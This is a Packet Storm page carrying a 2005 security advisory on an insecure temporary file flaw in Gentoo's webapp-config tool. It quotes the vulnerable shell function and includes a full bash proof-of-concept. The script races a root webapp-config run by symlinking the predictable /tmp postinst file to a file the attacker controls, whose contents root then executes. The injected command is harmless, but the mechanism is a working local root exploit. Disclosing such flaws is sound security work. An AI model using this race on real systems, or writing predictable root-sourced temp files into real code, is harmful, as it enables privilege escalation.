Gentoo webapp-config prior to v1.10-r14 insecure temp file creation advisory and local root exploit. Requires that the root user installs, upgrades, or deletes a Gentoo provided web application with the webapp-config tool. More information available here.
2b65efbc316467f3bf71596936ac3d3b83b43b919e292377283fe01bacb7a19b-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
#########################################################
Gentoo webapp-config insecure temporary file creation
Vendor: http://www.gentoo.org
Advisory: http://www.zataz.net/adviso/webapp-config-05182005.txt
Vendor informed: yes
Exploit available: yes
Impact : high
Exploitation : low
#########################################################
Gentoo webapp-config contain a security flaw wich could allow a
malicious local user to execute command with root privileges.
The vulnerability is due to an insecure temporary file creation.
The exploitation require that the root user install, upgrade or delete
Gentoo provided web application with the webapp-config tool.
##########
Versions:
##########
webapp-config < 1.10-r14
##########
Solution:
##########
Upgrade to net-www/webapp-config 1.10-r14
#########
Timeline:
#########
Discovered : 2005-05-07
Vendor notified : 2005-05-07
Vendor response : 2005-05-07
Vendor fix : 2005-05-08
Disclosure :
#####################
Technical details :
#####################
Vulnerable code :
- -----------------
Begin line 2711
fn_show_postinst ()
{
if [ ! -f "${MY_APPDIR}/postinst-en.txt" ]; then
return
fi
local my_file="/tmp/$$.postinst.txt"
fn_run_vars
# we create a temporary file, so that we can expand the
variables
# that are used in the file
echo "cat <<webapp-EOF" > "$my_file"
cat "${MY_APPDIR}/postinst-en.txt" >> "$my_file"
echo "webapp-EOF" >> "$my_file"
# execute the temporary file, to generate the output
echo
. "$my_file"
echo
# it's a temporary file, so let's get rid of it now
rm -f "$my_file"
}
#####
POC :
#####
http://www.zataz.net/dev/webapp-poc.sh.txt
#########
Related :
#########
Bug report : https://bugs.gentoo.org/show_bug.cgi?id=91785
GLSA : Waiting for it
#####################
Credits :
#####################
Eric Romang (eromang@zataz.net - ZATAZ Audit)
Thxs to Gentoo Security Team. (Taviso, jaervosz, solar, etc.)
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.1 (Darwin)
iD8DBQFCkF9vXXuxWE8lDAcRAjSjAJ0e4O5D5H2CDWOBex+Aay2BCYVznwCfci+7
KGXba0qvTu5b20ABcBkABKQ=
=7wI3
-----END PGP SIGNATURE-----
#!/bin/bash
# Eric Romang aka wow (eromang@zataz.net)
# webapp-config race condition how permit execution of arbitrary command with root privileges
# work with < webapp-config 1.10-r14
rm -f webapp-config_trace.txt fake_tmp_file /tmp/*.postinst.txt
touch ~/fake_tmp_file
echo "0" > webapp-config_trace.txt
status=`cat webapp-config_trace.txt`
echo "Waiting for webapp-config execution..."
while [ "$status" == 0 ]
do
ps auxw|grep webapp-config|grep root
if [ "$?" == 0 ]
then
echo "1" > webapp-config_trace.txt
fi
status=`cat webapp-config_trace.txt`
done
echo "Process caught !"
process_id=`pgrep -u root webapp-config`
ln -s ~/fake_tmp_file /tmp/$process_id.postinst.txt
echo "fake_file_created!"
echo "we force the file to be overwritten"
echo "0" > webapp-config_trace.txt
status=`cat webapp-config_trace.txt`
echo "Waiting the end of webapp-config"
echo "during all the configuration we force the file to be overwritten"
while [ "$status" == 0 ]
do
ps auxw|grep webapp-config|grep root
if [ "$?" == 1 ]
then
echo "1" > webapp-config_trace.txt
else
echo "echo premature end of script; exit 1;" > ~/fake_tmp_file
fi
status=`cat webapp-config_trace.txt`
done
echo "end of webapp-config"
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed